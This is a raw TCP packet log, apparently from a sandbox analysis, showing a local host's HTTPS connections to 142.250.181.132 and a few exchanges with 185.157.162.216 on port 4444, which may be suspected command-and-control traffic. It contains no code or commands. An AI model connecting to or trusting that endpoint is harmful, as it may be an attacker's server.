Dec 12, 2024 22:40:18.012864113 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.013214111 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.013223886 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.014374018 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.015345097 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.015378952 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.028342009 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.028419018 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.028428078 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.041970015 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.043049097 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.043061018 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.055886030 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.055936098 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.055943966 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.069660902 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.069701910 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.069709063 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.103441000 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.104206085 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.104218006 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.112368107 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.112390041 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.112451077 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.112459898 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.112497091 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.169469118 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.176285028 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.176312923 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.176345110 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.176378012 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.176466942 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.190079927 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.203104973 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.203160048 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.203185081 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.216306925 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.216350079 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.216377020 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.216418028 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.216522932 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.229247093 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.242175102 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.242250919 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.242270947 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.254915953 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.254997969 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.255006075 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.255047083 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.255120993 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.267389059 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.277192116 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.277283907 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.277291059 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.277323008 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.277384996 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.287463903 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.296996117 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.297065020 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.297086954 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.306605101 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.306694984 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.306708097 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.306734085 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.306778908 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.316313028 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.323215961 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.323298931 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.323307037 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.323349953 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.323426962 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.323906898 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.323995113 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.324129105 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.324428082 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.324465990 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.330158949 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.336930037 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.337021112 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.337090015 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.337112904 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.337688923 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.338712931 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.345602989 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.345664978 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.345684052 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.352812052 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.353010893 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.353029013 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.365281105 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.365348101 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.365369081 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.369457006 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.369529009 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.369545937 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.373558044 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.373615980 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.373635054 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.379882097 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.379954100 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.379975080 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.386394978 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.386446953 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.386465073 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.392834902 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.392884970 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.392901897 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.399235010 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.399324894 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.399343967 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.405872107 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.409329891 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.409352064 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.412373066 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.412466049 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.412487984 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.422571898 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.425328970 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.425354958 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.435554028 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.437342882 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.437370062 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.448276997 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.448363066 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.448456049 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.448484898 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.449311018 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.450809956 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.459530115 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.460654974 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.460742950 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.460777044 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.461293936 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.462435007 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.469245911 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.470253944 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.470336914 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.470357895 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.473311901 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.476980925 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.479352951 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.480025053 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.480057001 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.480484009 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.480552912 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.480561972 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.490150928 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.490211964 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.490221977 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.490340948 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.490389109 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.490395069 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.498894930 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.498967886 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.498977900 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.501121998 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.501189947 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.501199007 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.508488894 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.509322882 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.509334087 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.510071039 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.510130882 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.510140896 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.515480042 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.517312050 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.517321110 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.520454884 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.520520926 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.520529032 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.525703907 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.529337883 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.529360056 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.530462027 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.530513048 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.530523062 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.535713911 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.535758018 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.535767078 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.540432930 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.541315079 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.541323900 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.545300961 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.549313068 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.549320936 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.550084114 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.550133944 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.550142050 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.554776907 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.557311058 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.557322025 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.559298992 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.559351921 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.559360981 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.563090086 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.565315008 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.565327883 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.566565037 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.566612005 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.566618919 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.570197105 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.571360111 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.571371078 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.573770046 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.573822021 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.573829889 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.577253103 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.580317974 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.580327034 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.580804110 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.580851078 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.580858946 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.581091881 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.581135035 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.628590107 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.628663063 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.629132986 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.641693115 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.641736031 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.733325958 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.765875101 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.765897036 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.913043022 CET	4444	49718	185.157.162.216	192.168.2.5
Dec 12, 2024 22:40:18.914228916 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:40:19.034033060 CET	4444	49718	185.157.162.216	192.168.2.5
Dec 12, 2024 22:40:19.070060015 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:19.070099115 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:19.070156097 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:19.070354939 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:19.070372105 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:19.596744061 CET	4444	49718	185.157.162.216	192.168.2.5
Dec 12, 2024 22:40:19.677325964 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:40:19.704575062 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:19.708854914 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:19.708879948 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:19.709171057 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:19.725145102 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:19.725222111 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:19.725430965 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:19.725455999 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.017811060 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.030025959 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.030054092 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.030477047 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.031512976 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.031611919 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.031781912 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.079343081 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.335999012 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.336260080 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.336282969 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.339600086 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.339673996 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.340065002 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.340125084 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.340349913 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.340368032 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.456974030 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.457009077 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.457034111 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.457099915 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.457117081 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.457360029 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.464320898 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.475583076 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.475828886 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.475836039 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.477215052 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.477269888 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.487123966 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.487138987 CET	443	49722	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.547338009 CET	443	49726	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.553342104 CET	49726	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.704108953 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.704159975 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.704185963 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.704216003 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.704220057 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.704252005 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.704279900 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.718431950 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.718468904 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.718494892 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.718508959 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.718584061 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.724600077 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.737734079 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.737791061 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.737803936 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.759496927 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.759757042 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.759771109 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.760659933 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.760735035 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.761025906 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.761081934 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.761435032 CET	49733	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.761482000 CET	443	49733	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.761548996 CET	49733	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.761594057 CET	49734	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.761646032 CET	443	49734	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.761698961 CET	49734	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.761713982 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.761722088 CET	443	49727	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.761904955 CET	49733	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.761919022 CET	443	49733	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.762140989 CET	49734	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.762152910 CET	443	49734	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.890472889 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.890590906 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.890636921 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.900207043 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.900295973 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.900305033 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.909039974 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.909122944 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.909147024 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.917869091 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.917922020 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.917944908 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.928069115 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.928136110 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.928163052 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.935702085 CET	49727	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.942189932 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.942255020 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.942303896 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.955403090 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.955451965 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.955476046 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.964946032 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.965081930 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.965106964 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.985771894 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.985842943 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.985866070 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.991514921 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:20.991599083 CET	49725	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:20.991614103 CET	443	49725	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:21.010097027 CET	443	49725	142.250.181.132	192.168.2.5
